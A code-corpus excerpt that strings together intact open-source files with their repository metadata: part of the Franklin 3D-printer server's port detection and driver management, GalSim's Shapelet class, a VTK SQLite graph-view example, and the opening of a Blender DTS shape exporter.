		#log('calling %s on %d' % (repr(data), self.process.stdin.fileno()))
		try:
			self.process.stdin.write(data.encode('utf-8'))
			self.process.stdin.flush()
		except:
			log('killing machine handle because of error')
			#traceback.print_exc()
			def kill():
				cb(False, None)
				disable(self.uuid, 'error from machine')
			# Schedule this as a callback, so the generator isn't called recursively.
			websocketd.add_idle(kill)
			return
		#def debug_cb(success, ret):
		#	log('call {} returned: {}: {}'.format(name, success, ret))
		#	cb(success, ret)
		self.waiters[0][self.next_mid] = cb
		self.next_mid += 1
	# }}}
	def movewait(self, cb): # {{{
		'''Register a callback for the next movecb event.'''
		self.waiters[1][self.next_mid] = cb
		self.next_mid += 1
	# }}}
	def tempwait(self, cb): # {{{
		'''Register a callback for the next tempcb event.'''
		self.waiters[2][self.next_mid] = cb
		self.next_mid += 1
	# }}}
	def machine_error(self): # {{{
		'''Read-error callback for the driver's stdout; kill the machine and free its port.'''
		log('%s died from error; removing port.' % self.name)
		self.die('from error')
		del ports[self.port]
		return False
	# }}}
	def die(self, reason = 'at request'): # {{{
		'''Kill the driver process and fail all pending callbacks.'''
		log('{} died {}.'.format(self.uuid, reason))
		websocketd.remove_read(self.input_handle)
		try:
			self.process.kill()
		except:
			pass
		try:
			self.process.communicate()
		except:
			pass
		self.process = None
		for t in range(3):
			for w in self.waiters[t]:
				self.waiters[t][w](False, 'Machine {} died {}'.format(self.uuid, reason))
		if self.uuid in machines:
			del machines[self.uuid]
	# }}}
	def machine_input(self): # {{{
		'''Read and dispatch JSON lines (replies and events) from the driver.'''
		while self.process is not None:
			data = self.process.stdout.read()
			if data is None:
				#log('%s: no data now' % self.name)
				# No more data.
				return True
			if data == b'':
				# Connection closed.
				self.die('because there was an error')
				return False
			self.buffer += data
			#log('machine input:' + repr(data))
			while b'\n'[0] in self.buffer:
				pos = self.buffer.index(b'\n'[0])
				line = self.buffer[:pos]
				self.buffer = self.buffer[pos + 1:]
				data = json.loads(line.decode('utf-8'))
				#log('machine command input:' + repr(data))
				if data[1] == 'broadcast':
					broadcast(data[2], data[3], self.uuid, *(data[4:]))
				elif data[1] == 'disconnect':
					# Driver lost its serial connection; free the port.
					port = self.port
					ports[self.port] = None
					broadcast(None, 'port_state', port, 0)
					#if autodetect:
					#	websocketd.call(None, detect, port)
				elif data[1] == 'error':
					if data[0] is None:
						# Error on command without id.
						log('error on command without id: %s' % repr(data))
					else:
						self.waiters[0].pop(data[0])(False, data[2])
				elif data[1] == 'return':
					self.waiters[0].pop(data[0])(True, data[2])
				elif data[1] == 'movecb':
					self.waiters[1].pop(data[0])(True, data[2])
				elif data[1] == 'tempcb':
					self.waiters[2].pop(data[0])(True, data[2])
				else:
					raise AssertionError('invalid reply from machine process: %s' % repr(data))
	# }}}
	def remove_machine(self): # {{{
		'''Disconnect from the port if needed, kill the driver and forget the machine.'''
		def finish():
			broadcast(None, 'del_machine', self.uuid)
			del machines[self.uuid]
		self.call('die', ['admin', 'Machine is removed'], {}, lambda success, ret: self.die('because it was removed'))
		if self.port and ports[self.port]:
			assert ports[self.port] == self.uuid
			self.call('disconnect', ['admin'], {}, lambda success, ret: finish())
		else:
			finish()
	# }}}
# }}}
def nextid(): # {{{
	'''Return a fresh 8-byte run id, encoded with the protocol byte map.'''
	global last_id
	# 0x23456789 is an arbitrary number with bits set in every nybble, that is
	# odd(so it doesn't visit the same number twice until it did all of
	# them, because it loops at 2**32, which is not divisible by anything
	# except 2).
	last_id = (last_id + 0x23456789) & 0xffffffff
	nibbles = ((last_id >> shift) & 0xf for shift in range(0, 32, 4))
	return bytes(id_map[nibble] for nibble in nibbles)
# Seed with a random 32-bit value so run ids differ between server starts.
last_id = random.randrange(0x100000000)
# Parity table is [0x8b, 0x2d, 0x1e]; half of these codes overlap with codes from the single command map; those single commands are not used.
id_map = [0x40, 0xe1, 0xd2, 0x73, 0x74, 0xd5, 0xe6, 0x47, 0xf8, 0x59, 0x6a, 0xcb, 0xcc, 0x6d, 0x5e, 0xff]
# }}}
# TODO: see if this should be used again.
def job_done(port, completed, reason): # {{{
	'''Notify clients that a job finished and run the configured 'done' command.
	@param completed: True if the job ran to completion, False if aborted.
	@param reason: human-readable reason, substituted for [[REASON]].
	'''
	broadcast(None, 'running', port.port, False)
	if not config['done']:
		return
	state = 'completed' if completed else 'aborted'
	cmd = config['done'].replace('[[STATE]]', state).replace('[[REASON]]', reason)
	log('running %s' % cmd)
	p = subprocess.Popen(cmd, stdout = subprocess.PIPE, shell = True, close_fds = True)
	def on_output():
		# Drain the command's output; reap it when the stream ends.
		data = p.stdout.read()
		if data:
			log('Data from completion callback: %s' % repr(data))
			return True
		log('Callback for job completion done; return: %s' % repr(p.wait()))
		return False
	def on_error():
		log('Job completion process returned error.')
		return False
	websocketd.add_read(p.stdout, on_output, on_error)
# }}}
def disable(uuid, reason): # {{{
	'''Disconnect a machine from its port.
	@param uuid: machine uuid, or the cancel callable that a busy port
		stored in ports (in which case detection/upload is aborted).
	@param reason: passed on to the driver's disconnect call.
	'''
	if uuid is not None and not isinstance(uuid, str):
		# Not a uuid but a cancel callable; abort the operation in progress.
		uuid()
		return
	if uuid not in machines:
		log('not disabling nonexistent machine %s' % uuid)
		return
	machine = machines[uuid]
	if machine.port not in ports:
		log("not disabling machine which isn't enabled")
		return
	machine.call('disconnect', ('admin', reason), {}, lambda success, ret: None)
	freed = machine.port
	ports[freed] = None
	machine.port = None
	broadcast(None, 'port_state', freed, 0)
# }}}
class Admin_Connection: # {{{
	'''Line-based connection on the udev admin socket.
	udev scripts report hot-plugged serial ports here with
	"add <dev>" / "remove <dev>" commands.
	'''
	def __init__(self, remote): # {{{
		self.remote = remote
		remote.readlines(self.read)
		remote.disconnect_cb(lambda connection, data: data)
	# }}}
	def read(self, line): # {{{
		'''Parse and execute one command line from the socket.'''
		if line.strip() == '':
			return
		try:
			action, dev = line.split(None, 1)
		except:
			log('invalid command on admin socket: %s' % line)
			return
		dev = dev.strip()
		if action == 'add':
			add_port(dev)
		elif action == 'remove':
			remove_port(dev)
		else:
			log('invalid action on admin socket: %s' % line)
	# }}}
# }}}
def remove_port(port): # {{{
	'''Forget a serial port; any machine using it is disabled first.'''
	log('removing port %s' % port)
	if port not in ports:
		return
	occupant = ports[port]
	if occupant:
		disable(occupant, 'port is removed')
	del ports[port]
	broadcast(None, 'del_port', port)
# }}}
def add_port(port): # {{{
	'''Register a new serial port and, if enabled, start machine detection.
	Ports failing the whitelist or matching either blacklist are ignored.
	'''
	if port in ports:
		log('already existing port %s cannot be added' % port)
		return
	blacklisted = re.match(config['blacklist'], port) or re.match(config['add-blacklist'], port)
	if blacklisted or not re.match(config['whitelist'], port):
		#log('skipping blacklisted or non-whitelisted port %s' % port)
		return
	ports[port] = None
	broadcast(None, 'new_port', port, upload_options(port))
	broadcast(None, 'port_state', port, 0)
	if autodetect:
		websocketd.call(None, detect, port)
# }}}
def detect(port): # {{{
	'''Try to detect a machine on a serial port.
	The port is polled for an ID packet; depending on the reply a new
	driver process is started, a known machine is (re)connected, or a
	controller driver is spawned.  Ports named '-' or starting with '!'
	get a driver without a serial device.  While detection is busy,
	ports[port] holds a cancel callable.
	'''
	log('detecting machine on %s' % port)
	if port not in ports:
		log('port does not exist')
		return
	if ports[port] != None:
		# Abort detection in progress.
		if ports[port]:
			disable(ports[port], 'disabled to prepare for detection')
		if ports[port] != None:
			# This should never happen.
			log('BUG: port is not in detectable state. Please report this.')
			return
	broadcast(None, 'port_state', port, 1)
	if port == '-' or port.startswith('!'):
		# Virtual port: start a driver without a serial device.
		run_id = nextid()
		process = subprocess.Popen((fhs.read_data('driver.py', opened = False), '--uuid', '-', '--allow-system', config['allow-system']) + (('--system',) if fhs.is_system else ()), stdin = subprocess.PIPE, stdout = subprocess.PIPE, close_fds = True)
		machines[port] = Machine(port, process, run_id)
		ports[port] = port
		return False
	if not os.path.exists(port):
		log("not detecting on %s, because file doesn't exist." % port)
		return False
	if config['predetect']:
		# Run the predetect command with PORT exported in its environment.
		env = os.environ.copy()
		env['PORT'] = port
		subprocess.call(config['predetect'], env = env, shell = True)
	try:
		machine = serial.Serial(port, baudrate = 115200, timeout = 0)
	except serial.SerialException as e:
		log('failed to open serial port %s (%s).' % (port, str(e)))
		del ports[port]
		#traceback.print_exc()
		return False
	# We need to get the machine id first. If the machine is booting, this can take a while.
	id = [None, None, None, None] # data, timeouts, had data
	# Wait to make sure the command is interpreted as a new packet.
	def part2():
		id[0] = b''
		id[1] = 0
		id[2] = False
		def timeout():
			# Resend the ID request every .5s; give up after 30 tries.
			id[1] += 1
			if id[1] >= 30:
				# Timeout. Give up.
				websocketd.remove_read(watcher)
				machine.close()
				log('Timeout waiting for machine on port %s; giving up.' % port)
				ports[port] = None
				broadcast(None, 'port_state', port, 0)
				return
			if not id[2]:
				machine.write(protocol.single['ID'])
			else:
				id[2] = False
			timeout_handle[0] = websocketd.add_timeout(time.time() + .5, timeout)
		def boot_machine_input():
			id[2] = True
			ids = [protocol.single[code][0] for code in ('ID', 'STARTUP')]
			# CMD:1 ID:8 + 16 Checksum:9 Total: 34
			while len(id[0]) < 34:
				try:
					data = machine.read(34 - len(id[0]))
				except OSError:
					continue
				except IOError:
					continue
				id[0] += data
				#log('incomplete id: ' + id[0])
				if len(id[0]) < 34:
					if len(id[0]) > 0 and id[0][0] == protocol.single['CONTROLLER'][0]:
						# This is a controller. Spawn the process, then cancel this detection.
						websocketd.remove_timeout(timeout_handle[0])
						machine.close()
						ports[port] = None
						broadcast(None, 'port_state', port, 0)
						log('Starting controller driver on ' + port)
						env = os.environ.copy()
						env['PORT'] = port
						subprocess.Popen(config['controller'], env = env, shell = True)
						return False
					return True
			if id[0][0] not in ids or not protocol.check(id[0]):
				# Not a valid ID packet; resynchronize on the next candidate start byte.
				log('skip non-id: %s (%s)' % (''.join('%02x' % x for x in id[0]), repr(id[0])))
				f = len(id[0])
				for start in ids:
					if start in id[0][1:]:
						p = id[0].index(bytes((start,)), 1)
						if p < f:
							f = p
							log('Keeping some')
				if f == 0:
					f = 1
				id[0] = id[0][f:]
				return True
			# We have something to handle; cancel the timeout, but keep the serial port open to avoid a reset. (I don't think this even works, but it doesn't hurt.)
			websocketd.remove_timeout(timeout_handle[0])
			# This machine was running and tried to send an id. Check the id.
			uuid = id[0][9:9 + 16]
			if (uuid[7] & 0xf0) != 0x40 or (uuid[9] & 0xc0) != 0x80:
				# Broken uuid; create a new one and set it.
				log('broken uuid: ' + repr(uuid))
				uuid = None
			else:
				uuid = ''.join('%02x' % x for x in uuid[:16])
				uuid = uuid[:8] + '-' + uuid[8:12] + '-' + uuid[12:16] + '-' + uuid[16:20] + '-' + uuid[20:32]
			id[0] = id[0][1:9]
			running_machine = [p for p in machines if machines[p].run_id == id[0]]
			assert len(running_machine) < 2
			if len(running_machine) > 0:
				# Bug fix: running_machine holds dict keys (uuids), not
				# Machine objects; look the object up before using it.
				p = machines[running_machine[0]]
				assert p.uuid == uuid
				if p.port is not None:
					disable(p.uuid, 'disabled machine which was detected on different port')
				log('rediscovered machine %s on %s' % (''.join('%02x' % x for x in id[0]), port))
				ports[port] = p.uuid
				p.port = port
				# Bug fix: give defaults so the failure path below can
				# call this without arguments.
				def close_port(success = True, data = None):
					log('reconnect complete; closing server port')
					machine.close()
				# Bug fix: call the Machine object (ports[port] is only the uuid string).
				p.call('reconnect', ['admin', port], {}, lambda success, ret: (p.call('send_machine', ['admin', None], {}, close_port) if success else close_port()))
				broadcast(None, 'port_state', port, 2)
				return False
			run_id = nextid()
			# Find uuid or create new Machine object.
			if uuid in machines:
				log('accepting known machine on port %s (uuid %s)' % (port, uuid))
				machines[uuid].port = port
				ports[port] = uuid
				log('connecting %s to port %s' % (uuid, port))
				machines[uuid].call('connect', ['admin', port, [chr(x) for x in run_id]], {}, lambda success, ret: None)
			else:
				log('accepting unknown machine on port %s' % port)
				# Close detect port so it doesn't interfere.
				machine.close()
				#log('machines: %s' % repr(tuple(machines.keys())))
				process = subprocess.Popen((fhs.read_data('driver.py', opened = False), '--uuid', uuid if uuid is not None else '', '--allow-system', config['allow-system']) + (('--system',) if fhs.is_system else ()), stdin = subprocess.PIPE, stdout = subprocess.PIPE, close_fds = True)
				new_machine = Machine(port, process, run_id, send = False)
				def finish():
					# Bug fix: use the machine's (possibly regenerated)
					# uuid; the local uuid is still None when the driver
					# had to create a fresh one via reset_uuid.
					uuid = new_machine.uuid
					log('finish detect %s' % repr(uuid))
					ports[port] = uuid
					machines[uuid] = new_machine
					log('connecting new machine %s to port %s' % (uuid, port))
					new_machine.call('connect', ['admin', port, [chr(x) for x in run_id]], {}, lambda success, ret: None)
				if uuid is None:
					def prefinish(success, new_uuid):
						assert success
						new_machine.uuid = new_uuid
						new_machine.finish(finish)
					new_machine.call('reset_uuid', ['admin'], {}, prefinish)
				else:
					new_machine.finish(finish)
			return False
		def boot_machine_error():
			log('error during machine detection on port %s.' % port)
			websocketd.remove_timeout(timeout_handle[0])
			machine.close()
			ports[port] = None
			broadcast(None, 'port_state', port, 0)
			return False
		machine.write(protocol.single['ID'])
		timeout_handle = [websocketd.add_timeout(time.time() + .5, timeout)]
		watcher = websocketd.add_read(machine, boot_machine_input, boot_machine_error)
		def cancel():
			websocketd.remove_timeout(timeout_handle[0])
			websocketd.remove_read(watcher)
			machine.close()
			ports[port] = None
		ports[port] = cancel
	# Wait at least a second before sending anything, otherwise the bootloader thinks we might be trying to reprogram it.
	handle = websocketd.add_timeout(time.time() + 1.5, part2)
	def cancel():
		websocketd.remove_timeout(handle)
		ports[port] = None
	ports[port] = cancel
# }}}
# Main loop. {{{
def _disconnect(socket, data):
	# Forget the Connection object when its websocket goes away.
	del Connection.connections[socket.connection.id]
try:
	# The http/websocket server; a Connection is created for every websocket.
	httpd = Server(config['port'], Connection, disconnect_cb = _disconnect, httpdirs = fhs.read_data('html', dir = True, multiple = True), address = config['address'], log = config['log'], tls = tls)
	# Unix socket on which udev scripts report added/removed serial ports.
	udevsocket = fhs.write_runtime('udev.socket', packagename = 'franklin', opened = False)
	os.makedirs(os.path.dirname(udevsocket), exist_ok = True)
	if os.path.exists(udevsocket):
		# Remove a stale socket from a previous run.
		os.unlink(udevsocket)
	udevserver = network.Server(udevsocket, Admin_Connection)
except OSError:
	log('failed to start server: %s' % sys.exc_info()[1])
	sys.exit(1)
# }}}
# Initialization. {{{
def create_machine(uuid = None): # {{{
	'''Spawn a driver process for a machine and register it.
	@param uuid: uuid of a saved machine, or None to let the driver create one.
	@return the uuid under which the machine was registered.
	'''
	if uuid is None:
		uuid = protocol.new_uuid()
	cmdline = (fhs.read_data('driver.py', opened = False), '--uuid', uuid, '--allow-system', config['allow-system'])
	if fhs.is_system:
		cmdline += ('--system',)
	process = subprocess.Popen(cmdline, stdin = subprocess.PIPE, stdout = subprocess.PIPE, close_fds = True)
	machines[uuid] = Machine(None, process, None)
	return uuid
# }}}
# Start known machine drivers.
for d in fhs.read_data('.', dir = True, opened = False, multiple = True):
	for uuid in os.listdir(d):
		if uuid in machines:
			continue
		# Only directories that contain a profiles subdirectory are machines.
		if not os.path.isdir(os.path.join(d, uuid, 'profiles')):
			continue
		log('starting machine %s' % uuid)
		create_machine(uuid = uuid)
# Detect serial ports. {{{
# Assume a GNU/Linux system; if you have something else, you need to come up with a way to iterate over all your serial ports and implement it here. Patches welcome, especially if they are platform-independent.
try:
	# Try Linux sysfs.
	for tty in os.listdir('/sys/class/tty'):
		add_port('/dev/' + tty)
except:
	# Try more generic approach. Don't use this by default, because it doesn't detect all ports on GNU/Linux.
	try:
		import serial.tools.list_ports
		for tty in serial.tools.list_ports.comports():
			add_port(tty[0])
	except:
		traceback.print_exc()
		log('Not probing serial ports, because an error occurred: %s' % sys.exc_info()[1])
# }}}
# }}}
log('Franklin server is running')
websocketd.fgloop()
'''
ports is a dict with ports as keys and uuids as values, or None if no machine
is active on the port.
machines is a dict with uuids as keys and Machine objects as values.
At startup, all saved machines are loaded in the machines object, and all ports
are first found and inserted into the ports object, then machines are detected
on them. If found, the machine is enabled and the dicts are updated.
When a port is removed that has a machine attached, it is first disabled.
Machines can also be disabled manually, and detection on a port can be
requested manually as well.
'''
|
mtu-most/franklin
|
server/server.py
|
Python
|
agpl-3.0
| 38,340
|
[
"VisIt"
] |
5d082abb6a0bda7b0816e233a39ede88a8acf35d7e699abfbb51758ffe98a17b
|
# Copyright 2012, 2013 The GalSim developers:
# https://github.com/GalSim-developers
#
# This file is part of GalSim: The modular galaxy image simulation toolkit.
#
# GalSim is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GalSim is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GalSim. If not, see <http://www.gnu.org/licenses/>
#
"""@file shapelet.py
Shapelet is a GSObject that implements a shapelet decomposition of a profile.
"""
import galsim
from galsim import GSObject
class Shapelet(GSObject):
    """A class describing polar shapelet surface brightness profiles.

    This class describes an arbitrary profile in terms of a shapelet decomposition.  A shapelet
    decomposition is an eigenfunction decomposition of a 2-d function using the eigenfunctions
    of the 2-d quantum harmonic oscillator.  The functions are Laguerre polynomials multiplied
    by a Gaussian.  See Bernstein & Jarvis, 2002 or Massey & Refregier, 2005 for more detailed
    information about this kind of decomposition.  For this class, we follow the notation of
    Bernstein & Jarvis.

    The decomposition is described by an overall scale length, sigma, and a vector of
    coefficients, b.  The b vector is indexed by two values, which can be either (p,q) or (N,m).
    In terms of the quantum solution of the 2-d harmonic oscillator, p and q are the number of
    quanta with positive and negative angular momentum (respectively).  Then, N=p+q, m=p-q.

    The 2D image is given by (in polar coordinates):

        I(r,theta) = 1/sigma^2 Sum_pq b_pq psi_pq(r/sigma, theta)

    where psi_pq are the shapelet eigenfunctions, given by:

        psi_pq(r,theta) = (-)^q/sqrt(pi) sqrt(q!/p!) r^m exp(i m theta) exp(-r^2/2) L_q^(m)(r^2)

    and L_q^(m)(x) are generalized Laguerre polynomials.

    The coefficients b_pq are in general complex.  However, we require that the resulting
    I(r,theta) be purely real, which implies that b_pq = b_qp* (where * means complex conjugate).
    This further implies that b_pp (i.e. b_pq with p==q) is real.

    Initialization
    --------------

    1. Make a blank Shapelet instance with all b_pq = 0.

        shapelet = galsim.Shapelet(sigma=sigma, order=order)

    2. Make a Shapelet instance using a given vector for the b_pq values.

        order = 2
        bvec = [ 1, 0, 0, 0.2, 0.3, -0.1 ]
        shapelet = galsim.Shapelet(sigma=sigma, order=order, bvec=bvec)

    We use the following order for the coefficients, where the subscripts are in terms of p,q.

    [ b00  Re(b10)  Im(b10)  Re(b20)  Im(b20)  b11  Re(b30)  Im(b30)  Re(b21)  Im(b21) ... ]

    i.e. we progressively increase N, and for each value of N, we start with m=N and go down to
    m=0 or 1 as appropriate.  And since m=0 is intrinsically real, it only requires one spot
    in the list.

    @param sigma          The scale size in the standard units (usually arcsec).
    @param order          Specify the order of the shapelet decomposition.  This is the maximum
                          N=p+q included in the decomposition.
    @param bvec           The initial vector of coefficients.  (Default: all zeros)

    Methods
    -------

    The Shapelet is a GSObject, and inherits most of the GSObject methods (draw(), applyShear(),
    etc.) and operator bindings.  The exception is drawShoot, which is not yet implemented for
    Shapelet instances.

    In addition, Shapelet has the following methods:

    getSigma()         Get the sigma value.
    getOrder()         Get the order, the maximum N=p+q used by the decomposition.
    getBVec()          Get the vector of coefficients, returned as a numpy array.
    getPQ(p,q)         Get b_pq.  Returned as tuple (re, im) (even if p==q).
    getNM(N,m)         Get b_Nm.  Returned as tuple (re, im) (even if m=0).

    setSigma(sigma)    Set the sigma value.
    setOrder(order)    Set the order.
    setBVec(bvec)      Set the vector of coefficients.
    setPQ(p,q,re,im=0) Set b_pq.
    setNM(N,m,re,im=0) Set b_Nm.

    fitImage(image)    Fit for a shapelet decomposition of the given image.
    """

    # Initialization parameters of the object, with type information
    _req_params = { "sigma" : float, "order" : int }
    _opt_params = {}
    _single_params = []
    _takes_rng = False

    # --- Public Class methods ---
    def __init__(self, sigma, order, bvec=None, gsparams=None):
        # Make sure order and sigma are the right type:
        order = int(order)
        sigma = float(sigma)

        # Make bvec if necessary
        if bvec is None:
            bvec = galsim.LVector(order)
        else:
            bvec_size = galsim.LVectorSize(order)
            if len(bvec) != bvec_size:
                raise ValueError("bvec is the wrong size for the provided order")
            import numpy
            bvec = galsim.LVector(order,numpy.array(bvec))

        GSObject.__init__(self, galsim.SBShapelet(sigma, bvec, gsparams))

    def getSigma(self):
        return self.SBProfile.getSigma()
    def getOrder(self):
        return self.SBProfile.getBVec().order
    def getBVec(self):
        return self.SBProfile.getBVec().array
    def getPQ(self,p,q):
        return self.SBProfile.getBVec().getPQ(p,q)
    def getNM(self,N,m):
        # FIX: use integer (floor) division.  Under Python 3, (N+m)/2 is a
        # float, which is not a valid (p,q) index for getPQ.
        return self.SBProfile.getBVec().getPQ((N+m)//2,(N-m)//2)

    # Note: Since SBProfiles are officially immutable, these create a new
    # SBProfile object for this GSObject.  This is of course inefficient, but not
    # outrageously so, since the SBShapelet constructor is pretty minimalistic, and
    # presumably anyone who cares about efficiency would not be using these functions.
    # They would create the Shapelet with the right bvec from the start.
    def setSigma(self,sigma):
        bvec = self.SBProfile.getBVec()
        GSObject.__init__(self, galsim.SBShapelet(sigma, bvec))
    def setOrder(self,order):
        curr_bvec = self.SBProfile.getBVec()
        curr_order = curr_bvec.order
        if curr_order == order: return
        # Preserve the existing values as much as possible.
        sigma = self.SBProfile.getSigma()
        if curr_order > order:
            bvec = galsim.LVector(order, curr_bvec.array[0:galsim.LVectorSize(order)])
        else:
            import numpy
            a = numpy.zeros(galsim.LVectorSize(order))
            a[0:len(curr_bvec.array)] = curr_bvec.array
            bvec = galsim.LVector(order,a)
        GSObject.__init__(self, galsim.SBShapelet(sigma, bvec))
    def setBVec(self,bvec):
        sigma = self.SBProfile.getSigma()
        order = self.SBProfile.getBVec().order
        bvec_size = galsim.LVectorSize(order)
        if len(bvec) != bvec_size:
            raise ValueError("bvec is the wrong size for the Shapelet order")
        import numpy
        bvec = galsim.LVector(order,numpy.array(bvec))
        GSObject.__init__(self, galsim.SBShapelet(sigma, bvec))
    def setPQ(self,p,q,re,im=0.):
        sigma = self.SBProfile.getSigma()
        bvec = self.SBProfile.getBVec().copy()
        bvec.setPQ(p,q,re,im)
        GSObject.__init__(self, galsim.SBShapelet(sigma, bvec))
    def setNM(self,N,m,re,im=0.):
        # FIX: integer division, matching getNM (see above).
        self.setPQ((N+m)//2,(N-m)//2,re,im)

    def setFlux(self, flux):
        # More efficient to change the bvector rather than add a transformation layer above
        # the SBShapelet, which is what the normal setFlux method does.
        self.scaleFlux(flux/self.getFlux())

    def scaleFlux(self, fluxRatio):
        # More efficient to change the bvector rather than add a transformation layer above
        # the SBShapelet, which is what the normal setFlux method does.
        sigma = self.SBProfile.getSigma()
        bvec = self.SBProfile.getBVec() * fluxRatio
        GSObject.__init__(self, galsim.SBShapelet(sigma, bvec))

    def applyRotation(self, theta):
        if not isinstance(theta, galsim.Angle):
            raise TypeError("Input theta should be an Angle")
        sigma = self.SBProfile.getSigma()
        bvec = self.SBProfile.getBVec().copy()
        bvec.rotate(theta)
        GSObject.__init__(self, galsim.SBShapelet(sigma, bvec))

    def applyDilation(self, scale):
        # Dilation changes only the scale size, not the flux-carrying coefficients.
        sigma = self.SBProfile.getSigma() * scale
        bvec = self.SBProfile.getBVec()
        GSObject.__init__(self, galsim.SBShapelet(sigma, bvec))

    def applyMagnification(self, mu):
        # Magnification scales the area by mu (hence sigma by sqrt(mu)) and the flux by mu.
        import numpy
        sigma = self.SBProfile.getSigma() * numpy.sqrt(mu)
        bvec = self.SBProfile.getBVec() * mu
        GSObject.__init__(self, galsim.SBShapelet(sigma, bvec))

    def fitImage(self, image, center=None, normalization='flux'):
        """Fit for a shapelet decomposition of a given image

        The optional normalization parameter mirrors the parameter in the GSObject `draw` method.
        If the fitted shapelet is drawn with the same normalization value as was used when it
        was fit, then the resulting image should be an approximate match to the original image.

        For example:

            image = ...
            shapelet = galsim.Shapelet(sigma, order)
            shapelet.fitImage(image,normalization='sb')
            shapelet.draw(image=image2, dx=image.scale, normalization='sb')

        Then image2 and image should be as close to the same as possible for the given
        sigma and order.  Increasing the order can improve the fit, as can having sigma match
        the natural scale size of the image.  However, it should be noted that some images
        are not well fit by a shapelet for any (reasonable) order.

        @param image          The Image for which to fit the shapelet decomposition
        @param center         The position in pixels to use for the center of the decomposition.
                              [Default: use the image center (`image.bounds.trueCenter()`)]
        @param normalization  The normalization to assume for the image.
                              (Default `normalization = "flux"`)
        """
        if not center:
            center = image.bounds.trueCenter()
        # convert from PositionI if necessary
        center = galsim.PositionD(center.x,center.y)

        if not normalization.lower() in ("flux", "f", "surface brightness", "sb"):
            raise ValueError(("Invalid normalization requested: '%s'. Expecting one of 'flux', "+
                              "'f', 'surface brightness' or 'sb'.") % normalization)

        sigma = self.SBProfile.getSigma()
        bvec = self.SBProfile.getBVec().copy()

        galsim.ShapeletFitImage(sigma, bvec, image, center)

        if normalization.lower() == "flux" or normalization.lower() == "f":
            bvec /= image.scale**2

        # SBShapelet, like all SBProfiles, is immutable, so we need to reinitialize with a
        # new Shapelet object.
        GSObject.__init__(self, galsim.SBShapelet(sigma, bvec))
|
mardom/GalSim
|
galsim/shapelet.py
|
Python
|
gpl-3.0
| 11,288
|
[
"Galaxy",
"Gaussian"
] |
4bb77074420b1a80b37e59036fd04f791df83cbd2a93a7e63aacff6b9a66ca58
|
from vtk import *
import os.path

# Locate the SQLite sample database, trying two possible relative depths.
data_dir = "../../../../VTKData/Data/Infovis/SQLite/"
if not os.path.exists(data_dir):
    data_dir = "../../../../../VTKData/Data/Infovis/SQLite/"
sqlite_file = data_dir + "SmallEmailTest.db"

# Construct a graph from database tables (yes very tricky)
graph_source = vtkSQLDatabaseGraphSource()
graph_source.SetURL("sqlite://" + sqlite_file)
graph_source.SetEdgeQuery("select source, target from emails")
graph_source.SetVertexQuery("select Name, Job, Age from employee")
graph_source.AddLinkVertex("source", "Name", False)
graph_source.AddLinkVertex("target", "Name", False)
graph_source.AddLinkEdge("source", "target")

# Show the graph: label the vertices and color them by the Age column.
layout_view = vtkGraphLayoutView()
layout_view.AddRepresentationFromInputConnection(graph_source.GetOutputPort())
layout_view.SetVertexLabelArrayName("label")
layout_view.SetVertexLabelVisibility(True)
layout_view.SetVertexColorArrayName("Age")
layout_view.SetColorVertices(True)
layout_view.SetLayoutStrategyToSimple2D()

# Customize the mellow theme before handing it to the view.
mellow = vtkViewTheme.CreateMellowTheme()
mellow.SetCellColor(.2, .2, .6)
mellow.SetLineWidth(5)
mellow.SetPointSize(10)
layout_view.ApplyViewTheme(mellow)
mellow.FastDelete()

layout_view.GetRenderWindow().SetSize(600, 600)
layout_view.ResetCamera()
layout_view.Render()
layout_view.GetInteractor().Start()
|
jeffbaumes/jeffbaumes-vtk
|
Examples/Infovis/Python/databases2.py
|
Python
|
bsd-3-clause
| 1,219
|
[
"VTK"
] |
81eb01794793a39d5d8a98b003e25afa9b151137bbc9a809c2b8102d33efd8c0
|
'''
Dts_Shape.py
Copyright (c) 2003 - 2006 James Urquhart(j_urquhart@btinternet.com)
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
import bpy
from .Torque_Util import *
from .Dts_Mesh import Primitive, Cluster, DtsMesh
from .Dts_Stream import *
###############################
# Torque Game Engine
# -------------------------------
# Dts Shape Class(es) for Python
###############################
# Node class - DTS tree node
class Node:
    """A node (bone) in the DTS skeleton tree."""
    def __init__(self, na=0, pa=-1):
        # Index of this node's name in the DTS string table.
        self.name = na
        # Parent node number; -1 marks the root.
        self.parent = pa
        # The three fields below are deprecated and always stored as -1.
        self.firstObject = -1
        self.firstChild = -1
        self.nextSibling = -1
# dObject class - DTS object
class dObject:
    """A DTS object: a run of consecutive meshes attached to one node."""
    def __init__(self, na=0, nm=0, fm=0, no=-1):
        self.name = na  # index of its name in the DTS string table
        self.numMeshes = nm  # number of meshes (only one for detail level)
        self.firstMesh = fm  # number of the first mesh (meshes must be consecutive)
        self.node = no  # number of the node where the object is stored
        self.sibling = -1  # deprecated; set to -1
        self.firstDecal = -1  # deprecated; set to -1
    def duplicate(self):
        """Return an independent copy of this object.

        FIX: the original built the clone but never returned it, so callers
        always received None.
        """
        clone = dObject(self.name, self.numMeshes, self.firstMesh, self.node)
        clone.sibling = self.sibling
        clone.firstDecal = self.firstDecal
        return clone
# dMaterial class - DTS material
class dMaterial:
    """A DTS material record plus the flag-bit constants it uses."""
    # Material flags
    SWrap = 0x00000001
    TWrap = 0x00000002
    Translucent = 0x00000004
